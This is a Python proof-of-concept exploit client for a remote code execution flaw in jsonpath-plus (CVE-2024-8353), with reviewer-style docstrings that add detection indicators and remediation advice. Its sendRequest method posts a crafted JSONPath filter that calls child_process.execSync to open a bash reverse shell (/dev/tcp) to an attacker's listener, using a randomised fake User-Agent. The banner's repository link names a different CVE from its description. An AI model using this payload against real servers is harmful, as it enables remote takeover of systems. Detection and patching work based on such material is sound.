"""Proof-of-concept client for CVE-2024-8353 (jsonpath-plus < 10.3.0).

The script sends a single JSON POST whose ``path`` field is a JSONPath
filter expression; the vulnerable server-side evaluation of that filter is
the defect described in the banner text below.  From a defensive point of
view the interesting parts are the request body built in
``JSONPath_plus_Exploit.sendRequest`` (the detection artefact) and the
banner's own remediation statement (upgrade jsonpath-plus to 10.3.0 or
later).  Note that the tool's success message is printed on both the
success and the timeout path, so its output does not prove anything
about the target's state.
"""
import requests
from faker import Faker
from urllib.parse import urlparse  # imported but never used in this file
import time
import sys
import rich_click as click

# Silences urllib3's InsecureRequestWarning.  requests.post() below is never
# called with verify=False, so certificate verification is still performed
# and this suppression has no observable effect in this script.
requests.packages.urllib3.disable_warnings(
    requests.packages.urllib3.exceptions.InsecureRequestWarning
)

# NOTE(review): the banner links to an EQSTLab "CVE-2025-1302" repository while
# the descriptive text is about CVE-2024-8353 — confirm the intended reference.
# The banner is a runtime string (printed by greeting()), so it is left as-is.
banner = r""" ..-+*******- .=#+-------=@. .:==:. .**-------=*+: .-=++.-+=:. +*-------=#=+++++++++=:.. -+:==**=+-+:. .%----=+**+=-:::::::::-=+**+:. ==:=*=-==+=.. :%--**+-::::::::::::::::::::+*=: .::*=**=:. ..-++++*@#+-:::::::::::::::::::::::::-*+. ..-+:. ..+*+---=#+::::::::::::::::::::::::::::::=*:..-==-. .-#=---**:::::::::::::::::::::::::=+++-:::-#:.. :=+++++++==. ..-======-. ..:---:.. ..=**#=::::::::::::::::::::::::::::::::::::%:. *@@@@@@@@@@@@:.-#@@@@@@@@@%*:.-*%@@@@@@@%#=. .=#%=::::::::::::::::::::::::::::::::-::::-#. %@@@@@@@@@@@@+:%@@@@@@@@@@@%==%@@@@@@@@@@@%- .*+*+:::::::::::-=-::::::::::::::::-*#*=::::#: ..*#*+:. =++++***%@@@@+-@@@#====%@@@%==@@@#++++%@@@%- .+#*-::::::::::+*-::::::::::::::::::+=::::::-#..#+=+*%-. :=====+#@@@@-=@@@+. .%@@@%=+@@@+. .#@@@%- .+*::::::::::::::::::::::::+*******=::::::--@.+@#+==#-. #@@@@@@@@@@@@.=@@@%*++*%@@@%=+@@@#====@@@@%- .=+:::::::::::::=*+::::::-**=-----=#-::::::-@%+=+*%#:. .@@@@@@@@@@@%=.:%@@@@@@@@@@@#-=%@@@@@@@@@@@#- .=*::::::::::::-+**=::::-#+--------+#:::-::#@%*==+*- .@@@@#=----:. .-+*#%%%%@@@@#-:+#%@@@@@@@@@#- .-*::::::::::::::::::::=#=---------=#:::::-%+=*#%#-. .@@@@%######*+. .-%@@@#: .....:+@@@@*: :+=:::::::::::-:-::::-%=----------=#:::--%++++=** %@@@@@@@@@@@@. =%@@@#. =@@@@*. .-*-:::::::::::::::::**---------=+#=:::-#**#*+#*. -#%@@@@@@@@@#. -%@@%*. =@@@@+. .::-==##**-:::-::::::::::%=-----=+***=::::=##+#=.:: ..::----:::. .-=--. .=+=-. %+==--:::=*::::::::::::-:+#**+=**=::::::-#%=:-%. *+.......+*::::::::::::::::-****-:::::=*=:.++:*= .%:..::::*@@*-::::::::::::::-+=:::-+#%-. .#*#. ++:.....#--#%**=-:::::::::::-+**+=:@#....-+*=. :#:....:#-::%..-*%#++++++%@@@%*+-.#-=#+++-.. .++....-#:::%. .-*+-..*=.+@= .=+..-# .:+++#@#-:-#= ... .-++:-%@@= .:# :+++**##@#+=. -%@@@%- .-=*#. .=+::+::-@: #@@@@+. 
:+*=::=*- .=+:-**+%%+=-:.. =*#*-..=*-:::::=* :++---::--=*#+*+++++**+*+**-::::::+= .+*=:::---+*:::::++++++*+=:::::-*=. .:=**+====#*::::::=%:...-=++++=. Author: EQST(Experts, Qualified Security Team) ..:----=**++++*+. Github: https://github.com/EQSTLab/CVE-2025-1302 Analysis base : https://github.com/EQSTLab/CVE-2025-1302 ============================================================================================================= CVE-2024-8353 : JSONPath-plus Remote Code Execution description: Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of eval='safe' mode. **Note:** This is caused by an incomplete fix for [CVE-2024-21534](https://security.snyk.io/vuln/SNYK-JS-JSONPATHPLUS-7945884). ============================================================================================================= """


class JSONPath_plus_Exploit:
    """Holds the target URL and listener address and issues the single request.

    ``greeting`` and ``spinner`` are defined without ``self`` and are therefore
    only callable through the class object (which is how ``main`` uses them);
    calling them on an instance would pass ``self`` and raise ``TypeError``.
    """

    def __init__(self, url: str, ip: str, port: int) -> None:
        """Store the target URL and the reverse-shell listener host/port."""
        self.url = url
        self.ip = ip
        self.port = port
        # Assigned here but never read anywhere in this file.
        self.formId = None

    def greeting() -> None:
        """Print the module-level banner (no ``self``: call via the class)."""
        print(banner)

    def spinner(duration: float = 10, interval: float = 0.1) -> None:
        """Draw a text spinner on stdout for roughly ``duration`` seconds.

        Purely cosmetic: it sleeps ``interval`` seconds per frame and does not
        wait on, or reflect, any network activity.  Like ``greeting`` it takes
        no ``self`` and must be called via the class.
        """
        spinner_chars = ['|', '/', '-', '\\']
        end_time = time.time() + duration
        while time.time() < end_time:
            for char in spinner_chars:
                sys.stdout.write(f'\r[{char}] Exploit loading, please wait...')
                sys.stdout.flush()
                time.sleep(interval)
        print("")

    def sendRequest(self) -> None:
        """POST the malicious JSONPath expression to ``self.url``.

        The ``path`` value is a JSONPath filter ``$..[?( ... )]`` whose body
        reaches ``child_process.execSync`` and runs a bash reverse shell back
        to ``self.ip``:``self.port``.  For detection purposes the request body
        itself is the high-fidelity indicator: a JSON ``path`` field containing
        ``[?(`` together with ``constructor``, ``child_process`` or ``/dev/tcp``
        should not occur in legitimate traffic, and a vulnerable server would
        be expected to open an outbound TCP connection to the listener
        immediately afterwards.  The mitigation named in the banner is
        upgrading jsonpath-plus to 10.3.0 or later.

        Both the normal and the ``Timeout`` path print the same message, so
        the output cannot distinguish a connected shell from an unreachable or
        already-patched target.  Presumably the timeout is treated as success
        because ``execSync`` blocks while the shell stays connected — that is
        an inference, not something this code verifies.
        """
        # Fake User_Agent
        fake = Faker()
        url = f"{self.url}"
        pylode = f"$..[?(p=\"console.log(this.process.mainModule.require('child_process').execSync('bash -c \\\"bash -i >& /dev/tcp/{self.ip}/{self.port} 0>&1\\\"').toString())\";Ethan=''[['constructor']][['constructor']](p);Ethan())]"
        headers = {
            'User-Agent': fake.user_agent(),  # randomised per run; makes UA-based matching unreliable
            'Content-Type': 'application/json',
            'Accept': '*/*'
        }
        try:
            # No verify= argument: TLS verification stays enabled (see the
            # disable_warnings() note at the top).  The response is never
            # inspected, so status code and body are discarded.
            response = requests.post(url, json={'path' : pylode}, headers=headers, timeout=10)
            print(f"[+] Exploit Completion!!")  # f-string without placeholders
        except requests.exceptions.Timeout:
            # Same message as the success path; see docstring.
            print(f"[+] Exploit Completion!!")

    def exploit(self) -> None:
        """Thin wrapper around :meth:`sendRequest`."""
        self.sendRequest()


# argument parsing with rich_click
@click.command()
@click.option(
    "-u",
    "--url",
    required=True,
    help="Specify a URL or domain for vulnerability detection (Donation-Form Page)",
)
@click.option(
    "-i",
    "--ip",
    required=True,
    help="LHOST for reverse shell connection",
)
@click.option(
    "-p",
    "--port",
    required=True,
    type=int,
    help="LPORT for reverse shell connection"
)
def main(url: str, ip: str, port: int) -> None:
    """CLI entry point: print the banner, show a 1-second spinner, send the request.

    ``url`` is passed through to ``requests.post`` unchanged (no scheme or
    path validation is performed here, despite ``urlparse`` being imported).
    """
    cve_exploit = JSONPath_plus_Exploit(url, ip, port)
    JSONPath_plus_Exploit.greeting()
    JSONPath_plus_Exploit.spinner(duration=1)  # cosmetic delay only
    cve_exploit.exploit()


if __name__ == "__main__":
    main()